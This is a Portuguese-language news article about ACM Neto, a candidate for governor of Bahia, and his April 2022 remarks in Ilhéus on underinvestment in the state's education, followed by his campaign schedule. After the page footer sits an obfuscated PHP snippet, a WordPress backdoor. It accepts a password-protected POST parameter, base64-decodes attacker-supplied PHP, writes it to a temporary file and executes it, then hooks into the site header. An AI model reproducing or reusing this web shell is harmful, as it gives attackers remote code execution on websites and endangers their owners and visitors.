• SEJA BEM-VINDO

ACM Neto destaca que falta de investimento na educação condena futuro dos jovens da Bahia

Publicado em: 29/04/2022 Atualizado:: abril 29, 2022

 

O ex-prefeito de Salvador ponderou ainda que, “enquanto os gestores locais não projetarem a atenção para soluções capazes de tirar a Bahia do pior índice da educação de todo o país”

 

Durante evento realizado nesta quinta-feira (28) em Ilhéus, O pré-candidato ao Governo da Bahia ACM Neto (União Brasil) afirmou que é através do investimento maciço no ensino que o estado vai combater a pobreza e a desigualdade social. Neto destacou que a falta de atenção do governo atual com a educação na Bahia interfere diretamente no desenvolvimento dos jovens de todo o estado.

 

“É possível virar esse jogo. Afinal de contas, outros estados do Brasil avançam na educação, melhoram a qualidade do ensino, valorizam os professores e ainda investem em tecnologia”, disse.

 

O ex-prefeito de Salvador ponderou ainda que, enquanto os gestores locais não projetarem a atenção para soluções capazes de tirar a Bahia do pior índice da educação de todo o país, o estado seguirá estagnado, incapaz de acompanhar o crescimento mundial. “A pergunta que fica é: que estado podemos projetar para o futuro se os nossos governantes, nos últimos anos, esqueceram da educação? Se os nossos governantes estão condenando a juventude da Bahia? Se eles viraram as costas para a necessidade imprescindível da formação dos nossos jovens?”, questionou.

 

Ainda de acordo com o ex-prefeito de Salvador, “o futuro com crescimento sustentável não será possível se nós não investirmos também na educação. Se Deus me permitir chegar ao governo, o meu compromisso é de priorizar a educação e colocar a Bahia como o estado que mais vai investir na qualidade do ensino de todo o país”.

 

Agenda

 

O pré-candidato ao governo pelo União Brasil participa de outros dois eventos na cidade ainda nesta quinta-feira. ACM Neto acompanha o lançamento de pré-candidaturas de lideranças da região.

 

Nesta sexta-feira (29), Neto segue para a região Norte, onde visita os municípios de Juazeiro, Curaçá e Maniçoba. No sábado (30), o pré-candidato segue para Remanso, Sento Sé e Casa Nova.

 

……………………….

 

Fonte: Bahia.ba

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}